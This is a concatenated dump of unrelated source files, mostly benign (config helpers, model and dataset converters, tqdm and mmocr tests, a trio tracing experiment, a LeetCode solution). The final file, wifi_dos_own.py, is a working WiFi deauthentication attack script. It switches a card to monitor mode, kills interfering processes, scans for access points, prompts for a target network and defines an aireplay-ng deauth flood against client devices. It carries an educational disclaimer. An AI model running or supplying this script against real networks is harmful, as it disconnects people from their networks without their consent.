IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: is_declarative,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: False,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: True,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: False,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: False,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: False,
},
}
|
dot_dotfiles/mail/dot_offlineimap.py | TheRealOne78/dots | 758 | 17543 | #! /usr/bin/env python2
# -*- coding: utf8 -*-
from subprocess import check_output
def get_pass():
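    # Shell out to the `pass` password store and return the "gmail/me" entry
    # with its trailing newline stripped; the offlineimap config can then call
    # this helper instead of keeping the password in plain text.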
return check_output("pass gmail/me", shell=True).strip("\n")
|
macro_benchmark/SSD_Tensorflow/caffe_to_tensorflow.py | songhappy/ai-matrix | 180 | 17578 | """Convert a Caffe model file to TensorFlow checkpoint format.
Assume that the network built is equivalent to (or a sub-network of) the Caffe
definition.
"""
import tensorflow as tf
from nets import caffe_scope
from nets import nets_factory
slim = tf.contrib.slim
# =========================================================================== #
# Main flags.
# =========================================================================== #
tf.app.flags.DEFINE_string(
'model_name', 'ssd_300_vgg', 'Name of the model to convert.')
tf.app.flags.DEFINE_integer(
    'num_classes', 21, 'Number of classes in the dataset.')
tf.app.flags.DEFINE_string(
'caffemodel_path', None,
'The path to the Caffe model file to convert.')
FLAGS = tf.app.flags.FLAGS
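# Typical invocation (the .caffemodel path below is only an example):
#   python caffe_to_tensorflow.py --model_name=ssd_300_vgg --num_classes=21 \
#       --caffemodel_path=./VGG_VOC0712_SSD_300x300.caffemodel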
# =========================================================================== #
# Main converting routine.
# =========================================================================== #
def main(_):
# Caffe scope...
caffemodel = caffe_scope.CaffeScope()
caffemodel.load(FLAGS.caffemodel_path)
tf.logging.set_verbosity(tf.logging.INFO)
with tf.Graph().as_default():
global_step = slim.create_global_step()
num_classes = int(FLAGS.num_classes)
# Select the network.
ssd_class = nets_factory.get_network(FLAGS.model_name)
ssd_params = ssd_class.default_params._replace(num_classes=num_classes)
ssd_net = ssd_class(ssd_params)
ssd_shape = ssd_net.params.img_shape
# Image placeholder and model.
shape = (1, ssd_shape[0], ssd_shape[1], 3)
img_input = tf.placeholder(shape=shape, dtype=tf.float32)
# Create model.
with slim.arg_scope(ssd_net.arg_scope_caffe(caffemodel)):
ssd_net.net(img_input, is_training=False)
init_op = tf.global_variables_initializer()
with tf.Session() as session:
# Run the init operation.
session.run(init_op)
# Save model in checkpoint.
saver = tf.train.Saver()
ckpt_path = FLAGS.caffemodel_path.replace('.caffemodel', '.ckpt')
saver.save(session, ckpt_path, write_meta_graph=False)
if __name__ == '__main__':
tf.app.run()
|
gwd/converters/spike2kaggle.py | kazakh-shai/kaggle-global-wheat-detection | 136 | 17590 | import argparse
import os.path as osp
from glob import glob
import cv2
import pandas as pd
from tqdm import tqdm
from gwd.converters import kaggle2coco
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--image-pattern", default="/data/SPIKE_images/*jpg")
parser.add_argument("--annotation-root", default="/data/SPIKE_annotations")
parser.add_argument("--kaggle_output_path", default="/data/spike.csv")
parser.add_argument("--coco_output_path", default="/data/coco_spike.json")
return parser.parse_args()
def main():
args = parse_args()
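    # Each SPIKE image has a matching *.bboxes.tsv file with one
    # x_min/y_min/x_max/y_max row per box: clip the boxes to the image size,
    # convert them to [x, y, width, height] lists, then write the Kaggle-style
    # CSV and the derived COCO JSON.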
img_paths = glob(args.image_pattern)
annotations = []
for img_path in tqdm(img_paths):
ann_path = osp.join(args.annotation_root, (osp.basename(img_path.replace("jpg", "bboxes.tsv"))))
ann = pd.read_csv(ann_path, sep="\t", names=["x_min", "y_min", "x_max", "y_max"])
h, w = cv2.imread(img_path).shape[:2]
ann[["x_min", "x_max"]] = ann[["x_min", "x_max"]].clip(0, w)
ann[["y_min", "y_max"]] = ann[["y_min", "y_max"]].clip(0, h)
ann["height"] = h
ann["width"] = w
ann["bbox_width"] = ann["x_max"] - ann["x_min"]
ann["bbox_height"] = ann["y_max"] - ann["y_min"]
ann = ann[(ann["bbox_width"] > 0) & (ann["bbox_height"] > 0)].copy()
ann["bbox"] = ann[["x_min", "y_min", "bbox_width", "bbox_height"]].values.tolist()
ann["image_id"] = osp.basename(img_path).split(".")[0]
annotations.append(ann)
annotations = pd.concat(annotations)
annotations["source"] = "spike"
print(annotations.head())
annotations[["image_id", "source", "width", "height", "bbox"]].to_csv(args.kaggle_output_path, index=False)
kaggle2coco.main(args.kaggle_output_path, args.coco_output_path)
if __name__ == "__main__":
main()
|
emissary/controllers/load.py | LukeB42/Emissary | 193 | 17592 | <gh_stars>100-1000
# This file contains functions designed for
# loading cron tables and storing new feeds.
from emissary import db
from sqlalchemy import and_
from emissary.controllers.utils import spaceparse
from emissary.controllers.cron import parse_timings
from emissary.models import APIKey, Feed, FeedGroup
def create_feed(log, db, key, group, feed):
"""
Takes a key object, a group name and a dictionary
describing a feed ({name:,url:,schedule:,active:})
and reliably attaches a newly created feed to the key
and group.
"""
if not type(feed) == dict:
log('Unexpected type when creating feed for API key "%s"' % key.name)
return
for i in ['name', 'schedule', 'active', 'url']:
if not i in feed.keys():
log('%s: Error creating feed. Missing "%s" field from feed definition.' % (key.name, i))
return
f = Feed.query.filter(and_(Feed.key == key, Feed.name == feed['name'])).first()
fg = FeedGroup.query.filter(and_(FeedGroup.key == key, FeedGroup.name == group)).first()
if f:
if f.group:
log('%s: Error creating feed "%s" in group "%s", feed already exists in group "%s".' % \
(key.name, feed['name'], group, f.group.name))
return
elif fg:
log('%s: %s: Adding feed "%s"' % (key.name, fg.name, f.name))
fg.append(f)
db.session.add(fg)
db.session.add(f)
db.session.commit()
return
if not fg:
log('%s: Creating feed group %s.' % (key.name, group))
fg = FeedGroup(name=group)
key.feedgroups.append(fg)
try:
parse_timings(feed['schedule'])
except Exception, e:
log('%s: %s: Error creating "%s": %s' % \
(key.name, fg.name, feed['name'], e.message))
log('%s: %s: Creating feed "%s"' % (key.name, fg.name, feed['name']))
f = Feed(
name=feed['name'],
url=feed['url'],
active=feed['active'],
schedule=feed['schedule']
)
fg.feeds.append(f)
key.feeds.append(f)
db.session.add(key)
db.session.add(fg)
db.session.add(f)
db.session.commit()
def parse_crontab(filename):
"""
Get a file descriptor on filename and
create feeds and groups for API keys therein.
"""
def log(message):
print message
# read filename into a string named crontab
try:
fd = open(filename, "r")
except OSError:
print "Error opening %s" % filename
raise SystemExit
crontab = fd.read()
fd.close()
# keep a resident api key on hand
key = None
for i, line in enumerate(crontab.split('\n')):
# Set the APIKey we're working with when we find a line starting
# with apikey:
if line.startswith("apikey:"):
if ' ' in line:
key_str = line.split()[1]
key = APIKey.query.filter(APIKey.key == key_str).first()
if not key:
print 'Malformed or unknown API key at line %i in %s: %s' % (i+1, filename, line)
raise SystemExit
else:
print 'Using API key "%s".' % key.name
if line.startswith("http"):
feed = {'active': True}
# Grab the URL and set the string to the remainder
feed['url'] = line.split().pop(0)
line = ' '.join(line.split()[1:])
# Grab names and groups
names = spaceparse(line)
if not names:
print "Error parsing feed or group name at line %i in %s: %s" % (i+1, filename, line)
continue
feed['name'], group = names[:2]
# The schedule should be the last five items
schedule = line.split()[-5:]
try:
parse_timings(schedule)
except Exception, e:
print "Error parsing schedule at line %i in %s: %s" % (i+1, filename, e.message)
continue
feed['schedule'] = ' '.join(schedule)
create_feed(log, db, key, group, feed)
|
tests/test_utils/test_textio.py | hongxuenong/mmocr | 2,261 | 17605 | # Copyright (c) OpenMMLab. All rights reserved.
import tempfile
from mmocr.utils import list_from_file, list_to_file
lists = [
[],
[' '],
['\t'],
['a'],
[1],
[1.],
['a', 'b'],
['a', 1, 1.],
[1, 1., 'a'],
['啊', '啊啊'],
['選択', 'noël', 'Информацией', 'ÄÆä'],
]
def test_list_to_file():
with tempfile.TemporaryDirectory() as tmpdirname:
for i, lines in enumerate(lists):
filename = f'{tmpdirname}/{i}.txt'
list_to_file(filename, lines)
lines2 = [
line.rstrip('\r\n')
for line in open(filename, 'r', encoding='utf-8').readlines()
]
lines = list(map(str, lines))
assert len(lines) == len(lines2)
assert all(line1 == line2 for line1, line2 in zip(lines, lines2))
def test_list_from_file():
with tempfile.TemporaryDirectory() as tmpdirname:
for encoding in ['utf-8', 'utf-8-sig']:
for lineend in ['\n', '\r\n']:
for i, lines in enumerate(lists):
filename = f'{tmpdirname}/{i}.txt'
with open(filename, 'w', encoding=encoding) as f:
f.writelines(f'{line}{lineend}' for line in lines)
lines2 = list_from_file(filename, encoding=encoding)
lines = list(map(str, lines))
assert len(lines) == len(lines2)
assert all(line1 == line2
for line1, line2 in zip(lines, lines2))
|
notes-to-self/trace.py | guilledk/trio | 4,681 | 17617 | import trio
import os
import json
from itertools import count
# Experiment with generating Chrome Event Trace format, which can be browsed
# through chrome://tracing or other mechanisms.
#
# Screenshot: https://files.gitter.im/python-trio/general/fp6w/image.png
#
# Trace format docs: https://docs.google.com/document/d/1CvAClvFfyA5R-PhYUmn5OOQtYMH4h6I0nSsKchNAySU/preview#
#
# Things learned so far:
# - I don't understand how the ph="s"/ph="f" flow events work – I think
# they're supposed to show up as arrows, and I'm emitting them between tasks
# that wake each other up, but they're not showing up.
# - I think writing out json synchronously from each event is creating gaps in
# the trace; maybe better to batch them up to write up all at once at the
# end
# - including tracebacks would be cool
# - there doesn't seem to be any good way to group together tasks based on
# nurseries. this really limits the value of this particular trace
# format+viewer for us. (also maybe we should have an instrumentation event
# when a nursery is opened/closed?)
# - task._counter should maybe be public
# - I don't know how to best show task lifetime, scheduling times, and what
# the task is actually doing on the same plot. if we want to show particular
# events like "called stream.send_all", then the chrome trace format won't
# let us also show "task is running", because neither kind of event is
# strictly nested inside the other
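# For reference, each call to _write below appends one JSON object (plus a
# trailing comma) to the output file; an emitted event looks roughly like
#   {"name": "running", "ph": "B", "tid": 3, "pid": 12345, "ts": 1234567.0},
# where the field values here are purely illustrative.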
class Trace(trio.abc.Instrument):
def __init__(self, out):
self.out = out
self.out.write("[\n")
self.ids = count()
self._task_metadata(-1, "I/O manager")
def _write(self, **ev):
ev.setdefault("pid", os.getpid())
if ev["ph"] != "M":
ev.setdefault("ts", trio.current_time() * 1e6)
self.out.write(json.dumps(ev))
self.out.write(",\n")
def _task_metadata(self, tid, name):
self._write(
name="thread_name",
ph="M",
tid=tid,
args={"name": name},
)
self._write(
name="thread_sort_index",
ph="M",
tid=tid,
args={"sort_index": tid},
)
def task_spawned(self, task):
self._task_metadata(task._counter, task.name)
self._write(
name="task lifetime",
ph="B",
tid=task._counter,
)
def task_exited(self, task):
self._write(
name="task lifetime",
ph="E",
tid=task._counter,
)
def before_task_step(self, task):
self._write(
name="running",
ph="B",
tid=task._counter,
)
def after_task_step(self, task):
self._write(
name="running",
ph="E",
tid=task._counter,
)
def task_scheduled(self, task):
try:
waker = trio.lowlevel.current_task()
except RuntimeError:
pass
else:
id = next(self.ids)
self._write(
ph="s",
cat="wakeup",
id=id,
tid=waker._counter,
)
self._write(
cat="wakeup",
ph="f",
id=id,
tid=task._counter,
)
def before_io_wait(self, timeout):
self._write(
name=f"I/O wait",
ph="B",
tid=-1,
)
def after_io_wait(self, timeout):
self._write(
name=f"I/O wait",
ph="E",
tid=-1,
)
async def child1():
print(" child1: started! sleeping now...")
await trio.sleep(1)
print(" child1: exiting!")
async def child2():
print(" child2: started! sleeping now...")
await trio.sleep(1)
print(" child2: exiting!")
async def parent():
print("parent: started!")
async with trio.open_nursery() as nursery:
print("parent: spawning child1...")
nursery.start_soon(child1)
print("parent: spawning child2...")
nursery.start_soon(child2)
print("parent: waiting for children to finish...")
# -- we exit the nursery block here --
print("parent: all done!")
t = Trace(open("/tmp/t.json", "w"))
trio.run(parent, instruments=[t])
|
python/array/leetcode/move_zero.py | googege/algo-learn | 153 | 17624 | <reponame>googege/algo-learn<filename>python/array/leetcode/move_zero.py
from typing import List
# Move Zeroes
class Solution:
    # Approach 1: build a new array with the non-zero values first, then copy it back
def moveZeroes1(self, nums: List[int]) -> None:
temp, k = [0] * len(nums), 0
for n in nums:
if n != 0:
temp[k] = n
k += 1
nums[:] = temp[:]
    # Approach 2: two-pointer solution with in-place swaps
def moveZeroes2(self, nums: List[int]) -> None:
k = 0
for i, v in enumerate(nums):
if v != 0:
nums[i], nums[k] = nums[k], nums[i]
k += 1
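# Illustrative usage: both methods mutate the list in place, e.g.
#   nums = [0, 1, 0, 3, 12]
#   Solution().moveZeroes2(nums)  # nums -> [1, 3, 12, 0, 0]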
|
tests/tests_main.py | insilications/tqdm-clr | 22,617 | 17629 | <filename>tests/tests_main.py
"""Test CLI usage."""
import logging
import subprocess # nosec
import sys
from functools import wraps
from os import linesep
from tqdm.cli import TqdmKeyError, TqdmTypeError, main
from tqdm.utils import IS_WIN
from .tests_tqdm import BytesIO, _range, closing, mark, raises
def restore_sys(func):
"""Decorates `func(capsysbin)` to save & restore `sys.(stdin|argv)`."""
@wraps(func)
def inner(capsysbin):
"""function requiring capsysbin which may alter `sys.(stdin|argv)`"""
_SYS = sys.stdin, sys.argv
try:
res = func(capsysbin)
finally:
sys.stdin, sys.argv = _SYS
return res
return inner
def norm(bytestr):
"""Normalise line endings."""
return bytestr if linesep == "\n" else bytestr.replace(linesep.encode(), b"\n")
@mark.slow
def test_pipes():
"""Test command line pipes"""
ls_out = subprocess.check_output(['ls']) # nosec
ls = subprocess.Popen(['ls'], stdout=subprocess.PIPE) # nosec
res = subprocess.Popen( # nosec
[sys.executable, '-c', 'from tqdm.cli import main; main()'],
stdin=ls.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = res.communicate()
assert ls.poll() == 0
# actual test:
assert norm(ls_out) == norm(out)
assert b"it/s" in err
if sys.version_info[:2] >= (3, 8):
test_pipes = mark.filterwarnings("ignore:unclosed file:ResourceWarning")(
test_pipes)
def test_main_import():
"""Test main CLI import"""
N = 123
_SYS = sys.stdin, sys.argv
# test direct import
sys.stdin = [str(i).encode() for i in _range(N)]
sys.argv = ['', '--desc', 'Test CLI import',
'--ascii', 'True', '--unit_scale', 'True']
try:
import tqdm.__main__ # NOQA, pylint: disable=unused-variable
finally:
sys.stdin, sys.argv = _SYS
@restore_sys
def test_main_bytes(capsysbin):
"""Test CLI --bytes"""
N = 123
# test --delim
IN_DATA = '\0'.join(map(str, _range(N))).encode()
with closing(BytesIO()) as sys.stdin:
sys.stdin.write(IN_DATA)
# sys.stdin.write(b'\xff') # TODO
sys.stdin.seek(0)
main(sys.stderr, ['--desc', 'Test CLI delim', '--ascii', 'True',
'--delim', r'\0', '--buf_size', '64'])
out, err = capsysbin.readouterr()
assert out == IN_DATA
assert str(N) + "it" in err.decode("U8")
# test --bytes
IN_DATA = IN_DATA.replace(b'\0', b'\n')
with closing(BytesIO()) as sys.stdin:
sys.stdin.write(IN_DATA)
sys.stdin.seek(0)
main(sys.stderr, ['--ascii', '--bytes=True', '--unit_scale', 'False'])
out, err = capsysbin.readouterr()
assert out == IN_DATA
assert str(len(IN_DATA)) + "B" in err.decode("U8")
@mark.skipif(sys.version_info[0] == 2, reason="no caplog on py2")
def test_main_log(capsysbin, caplog):
"""Test CLI --log"""
_SYS = sys.stdin, sys.argv
N = 123
sys.stdin = [(str(i) + '\n').encode() for i in _range(N)]
IN_DATA = b''.join(sys.stdin)
try:
with caplog.at_level(logging.INFO):
main(sys.stderr, ['--log', 'INFO'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
assert not caplog.record_tuples
with caplog.at_level(logging.DEBUG):
main(sys.stderr, ['--log', 'DEBUG'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
assert caplog.record_tuples
finally:
sys.stdin, sys.argv = _SYS
@restore_sys
def test_main(capsysbin):
"""Test misc CLI options"""
N = 123
sys.stdin = [(str(i) + '\n').encode() for i in _range(N)]
IN_DATA = b''.join(sys.stdin)
# test --tee
main(sys.stderr, ['--mininterval', '0', '--miniters', '1'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
assert N <= len(err.split(b"\r")) < N + 5
len_err = len(err)
main(sys.stderr, ['--tee', '--mininterval', '0', '--miniters', '1'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
# spaces to clear intermediate lines could increase length
assert len_err + len(norm(out)) <= len(err)
# test --null
main(sys.stderr, ['--null'])
out, err = capsysbin.readouterr()
assert not out and b"123/123" in err
# test integer --update
main(sys.stderr, ['--update'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA
assert (str(N // 2 * N) + "it").encode() in err, "expected arithmetic sum formula"
# test integer --update_to
main(sys.stderr, ['--update-to'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA
assert (str(N - 1) + "it").encode() in err
assert (str(N) + "it").encode() not in err
with closing(BytesIO()) as sys.stdin:
sys.stdin.write(IN_DATA.replace(b'\n', b'D'))
# test integer --update --delim
sys.stdin.seek(0)
main(sys.stderr, ['--update', '--delim', 'D'])
out, err = capsysbin.readouterr()
assert out == IN_DATA.replace(b'\n', b'D')
assert (str(N // 2 * N) + "it").encode() in err, "expected arithmetic sum"
# test integer --update_to --delim
sys.stdin.seek(0)
main(sys.stderr, ['--update-to', '--delim', 'D'])
out, err = capsysbin.readouterr()
assert out == IN_DATA.replace(b'\n', b'D')
assert (str(N - 1) + "it").encode() in err
assert (str(N) + "it").encode() not in err
# test float --update_to
sys.stdin = [(str(i / 2.0) + '\n').encode() for i in _range(N)]
IN_DATA = b''.join(sys.stdin)
main(sys.stderr, ['--update-to'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA
assert (str((N - 1) / 2.0) + "it").encode() in err
assert (str(N / 2.0) + "it").encode() not in err
@mark.slow
@mark.skipif(IS_WIN, reason="no manpages on windows")
def test_manpath(tmp_path):
"""Test CLI --manpath"""
man = tmp_path / "tqdm.1"
assert not man.exists()
with raises(SystemExit):
main(argv=['--manpath', str(tmp_path)])
assert man.is_file()
@mark.slow
@mark.skipif(IS_WIN, reason="no completion on windows")
def test_comppath(tmp_path):
"""Test CLI --comppath"""
man = tmp_path / "tqdm_completion.sh"
assert not man.exists()
with raises(SystemExit):
main(argv=['--comppath', str(tmp_path)])
assert man.is_file()
# check most important options appear
script = man.read_text()
opts = {'--help', '--desc', '--total', '--leave', '--ncols', '--ascii',
'--dynamic_ncols', '--position', '--bytes', '--nrows', '--delim',
'--manpath', '--comppath'}
assert all(args in script for args in opts)
@restore_sys
def test_exceptions(capsysbin):
"""Test CLI Exceptions"""
N = 123
sys.stdin = [str(i) + '\n' for i in _range(N)]
IN_DATA = ''.join(sys.stdin).encode()
with raises(TqdmKeyError, match="bad_arg_u_ment"):
main(sys.stderr, argv=['-ascii', '-unit_scale', '--bad_arg_u_ment', 'foo'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
with raises(TqdmTypeError, match="invalid_bool_value"):
main(sys.stderr, argv=['-ascii', '-unit_scale', 'invalid_bool_value'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
with raises(TqdmTypeError, match="invalid_int_value"):
main(sys.stderr, argv=['-ascii', '--total', 'invalid_int_value'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
with raises(TqdmKeyError, match="Can only have one of --"):
main(sys.stderr, argv=['--update', '--update_to'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
# test SystemExits
for i in ('-h', '--help', '-v', '--version'):
with raises(SystemExit):
main(argv=[i])
|
tools/replace_version.py | jasmcaus/image-deep-learning-keras | 681 | 17632 | import os
def replace_version(old_version, new_version):
if not isinstance(old_version, tuple) or not isinstance(new_version, tuple):
        raise ValueError("`old_version` and `new_version` must be version tuples, e.g. (1, 2, 3)")
major, minor, micro = old_version[:3]
old_version = f'{major}.{minor}.{micro}'
major, minor, micro = new_version[:3]
new_version = f'{major}.{minor}.{micro}'
print(f"New version = {new_version}")
for root, _, files in os.walk('../caer'):
for file in files:
if file.endswith(('.py', '.cpp', '.c', '.h', '.hpp')):
with open(os.path.abspath(os.path.join(root, file)), 'r') as f:
new_text = f.read().replace('version ' + old_version, 'version ' + new_version)
with open(os.path.abspath(os.path.join(root, file)), 'w') as f:
print(os.path.abspath(os.path.join(root, file)))
f.write(new_text)
replace_version((1,8,0), (3,9,1))
|
wifi_dos_own.py | Mr-Cracker-Pro/red-python-scripts | 1,353 | 17694 | <filename>wifi_dos_own.py
#!/usr/bin/env python3
# Disclaimer:
# This script is for educational purposes only.
# Do not use against any network that you don't own or have authorization to test.
#!/usr/bin/python3
# We will be using the csv module to work with the data captured by airodump-ng.
import csv
# If we move csv files to a backup directory we will use the datetime module to create
# to create a timestamp in the file name.
from datetime import datetime
# We will use the os module to get the current working directory and to list filenames in a directory.
import os
# We will use the regular expressions module to find wifi interface name, and also MAC Addresses.
import re
# We will use methods from the shutil module to move files.
import shutil
# We can use the subprocess module to run operating system commands.
import subprocess
# We will create a thread for each deauth sent to a MAC so that enough time doesn't elapse to allow a device back on the network.
import threading
# We use the sleep method in the menu.
import time
# Helper functions
def in_sudo_mode():
"""If the user doesn't run the program with super user privileges, don't allow them to continue."""
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
exit()
def find_nic():
"""This function is used to find the network interface controllers on your computer."""
# We use the subprocess.run to run the "sudo iw dev" command we'd normally run to find the network interfaces.
result = subprocess.run(["iw", "dev"], capture_output=True).stdout.decode()
network_interface_controllers = wlan_code.findall(result)
return network_interface_controllers
def set_monitor_mode(controller_name):
"""This function needs the network interface controller name to put it into monitor mode.
Argument: Network Controller Name"""
# Put WiFi controller into monitor mode.
# This is one way to put it into monitoring mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Killing conflicting processes makes sure that nothing interferes with putting controller into monitor mode.
subprocess.run(["airmon-ng", "check", "kill"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iw", wifi_name, "set", "monitor", "none"])
# Bring the WiFi controller back online.
subprocess.run(["ip", "link", "set", wifi_name, "up"])
def set_band_to_monitor(choice):
"""If you have a 5Ghz network interface controller you can use this function to put monitor either 2.4Ghz or 5Ghz bands or both."""
if choice == "0":
# Bands b and g are 2.4Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "bg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
elif choice == "1":
# Band a is for 5Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "a", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
# Will use bands a, b and g (actually band n). Checks full spectrum.
subprocess.Popen(["airodump-ng", "--band", "abg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def backup_csv():
"""Move all .csv files in the directory to a new backup folder."""
for file_name in os.listdir():
# We should only have one csv file as we delete them from the folder every time we run the program.
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
# We get the current working directory.
directory = os.getcwd()
try:
# We make a new directory called /backup
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
# Create a timestamp
timestamp = datetime.now()
# We copy any .csv files in the folder to the backup folder.
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
def check_for_essid(essid, lst):
"""Will check if there is an ESSID in the list and then send False to end the loop."""
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
# This will only run if there are wireless access points in the list.
for item in lst:
# If True don't add to list. False will add it to list
if essid in item["ESSID"]:
check_status = False
return check_status
def wifi_networks_menu():
""" Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c."""
active_wireless_networks = list()
try:
while True:
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
if row["BSSID"] == "BSSID":
pass
elif row["BSSID"] == "Station MAC":
break
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("No |\tBSSID |\tChannel|\tESSID |")
print("___|\t___________________|\t_______|\t______________________________|")
for index, item in enumerate(active_wireless_networks):
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
# We make the script sleep for 1 second before loading the updated list.
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to make choice.")
# Ensure that the input choice is valid.
while True:
net_choice = input("Please select a choice from above: ")
if active_wireless_networks[int(net_choice)]:
return active_wireless_networks[int(net_choice)]
print("Please try again.")
def set_into_managed_mode(wifi_name):
"""SET YOUR NETWORK CONTROLLER INTERFACE INTO MANAGED MODE & RESTART NETWORK MANAGER
ARGUMENTS: wifi interface name
"""
# Put WiFi controller into monitor mode.
# This is one way to put it into managed mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iwconfig", wifi_name, "mode", "managed"])
subprocess.run(["ip", "link", "set", wifi_name, "up"])
subprocess.run(["service", "NetworkManager", "start"])
def get_clients(hackbssid, hackchannel, wifi_name):
subprocess.Popen(["airodump-ng", "--bssid", hackbssid, "--channel", hackchannel, "-w", "clients", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def deauth_attack(network_mac, target_mac, interface):
# We are using aireplay-ng to send a deauth packet. 0 means it will send it indefinitely. -a is used to specify the MAC address of the target router. -c is used to specify the mac we want to send the deauth packet.
# Then we also need to specify the interface
subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", network_mac, "-c", target_mac, interface])
# Regular Expressions to be used.
mac_address_regex = re.compile(r'(?:[0-9a-fA-F]:?){12}')
wlan_code = re.compile("Interface (wlan[0-9]+)")
# Program Header
# Basic user interface header
print(r"""______ _ _ ______ _ _
| _ \ (_) | | | ___ \ | | | |
| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
print("\n****************************************************************")
print("\n* Copyright of <NAME>, 2021 *")
print("\n* https://www.davidbombal.com *")
print("\n* https://www.youtube.com/davidbombal *")
print("\n****************************************************************")
# In Sudo Mode?
in_sudo_mode()
# Move any csv files to current working directory/backup
backup_csv()
# Lists to be populated
macs_not_to_kick_off = list()
# Menu to request Mac Addresses to be kept on network.
while True:
print("Please enter the MAC Address(es) of the device(s) you don't want to kick off the network.")
macs = input("Please use a comma separated list if more than one, ie 00:11:22:33:44:55,11:22:33:44:55:66 :")
# Use the MAC Address Regex to find all the MAC Addresses entered in the above input.
macs_not_to_kick_off = mac_address_regex.findall(macs)
# We reassign all the MAC address to the same variable as a list and make them uppercase using a list comprehension.
macs_not_to_kick_off = [mac.upper() for mac in macs_not_to_kick_off]
# If you entered a valid MAC Address the program flow will continue and break out of the while loop.
if len(macs_not_to_kick_off) > 0:
break
print("You didn't enter valid Mac Addresses.")
# Menu to ask which bands to scan with airmon-ng
while True:
wifi_controller_bands = ["bg (2.4Ghz)", "a (5Ghz)", "abg (Will be slower)"]
print("Please select the type of scan you want to run.")
for index, controller in enumerate(wifi_controller_bands):
print(f"{index} - {controller}")
# Check if the choice exists. If it doesn't it asks the user to try again.
# We don't cast it to an integer at this stage as characters other than digits will cause the program to break.
band_choice = input("Please select the bands you want to scan from the list above: ")
try:
if wifi_controller_bands[int(band_choice)]:
# Since the choice exists and is an integer we can cast band choice as an integer.
band_choice = int(band_choice)
break
except:
print("Please make a valid selection.")
# Find all the network interface controllers.
network_controllers = find_nic()
if len(network_controllers) == 0:
# If no networks interface controllers connected to your computer the program will exit.
print("Please connect a network interface controller and try again!")
exit()
# Select the network interface controller you want to put into monitor mode.
while True:
for index, controller in enumerate(network_controllers):
print(f"{index} - {controller}")
controller_choice = input("Please select the controller you want to put into monitor mode: ")
try:
if network_controllers[int(controller_choice)]:
break
except:
print("Please make a valid selection!")
# Assign the network interface controller name to a variable for easy use.
wifi_name = network_controllers[int(controller_choice)]
# Set network interface controller to monitor mode.
set_monitor_mode(wifi_name)
# Monitor the selected wifi band(s).
set_band_to_monitor(band_choice)
# Print WiFi Menu
wifi_network_choice = wifi_networks_menu()
hackbssid = wifi_network_choice["BSSID"]
# We strip out all the extra white space to just get the channel.
hackchannel = wifi_network_choice["channel"].strip()
# backup_csv()
# Run against only the network we want to kick clients off.
get_clients(hackbssid, hackchannel, wifi_name)
